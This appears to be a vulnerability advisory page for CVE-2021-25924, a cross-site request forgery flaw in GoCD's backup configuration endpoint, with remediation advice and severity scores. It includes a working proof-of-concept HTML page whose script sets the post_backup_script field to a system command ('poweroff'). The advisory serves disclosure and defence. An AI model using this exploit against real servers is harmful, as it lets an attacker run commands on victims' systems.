icon

We found results for “

CVE-2021-25924

Date: April 1, 2021

Overview

In GoCD, versions 19.6.0 to 21.1.0 are vulnerable to Cross-Site Request Forgery due to missing CSRF protection at the `/go/api/config/backup` endpoint. An attacker can trick a victim to click on a malicious link which could change backup configurations or execute system commands in the post_backup_script field.

Details

The module `GoCD` can be abused by Cross-Site Request Forgery due to missing CSRF protection at the `/go/api/config/backup` endpoint. Due to this flaw, an attacker can trick the victim to change the backup configuration settings such as executing system commands in the post_backup_script field and changing the backup schedule by enticing a user to click upon the attacker-controlled website.

PoC Details

Create a file with below content. When an authenticated user clicks on a malicious link sent by the attacker, a CSRF request will be sent to the legitimate server and the backup configuration is changed.

PoC Code

< html>
    < script> function backup() {
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.withCredentials = true;
        xmlhttp.open("POST", "http://localhost:8153/go/api/config/backup", true);
        xmlhttp.setRequestHeader("Accept", "application/vnd.go.cd.v1+json");
        xmlhttp.send(JSON.stringify({
        "schedule": null,
        "post_backup_script": "poweroff",
        "email_on_success": false,
        "email_on_failure": false
        }));
        }
        backup(); < /script>

            </html>

Affected Environments

19.6.0-21.1.0

Prevention

Upgrade to 21.2.0

Language: Java

Good to know:

icon

Cross-Site Request Forgery (CSRF)

CWE-352
icon

Upgrade Version

Upgrade to version 21.2.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): Complete
Integrity (I): Complete
Availability (A): Complete
Additional information: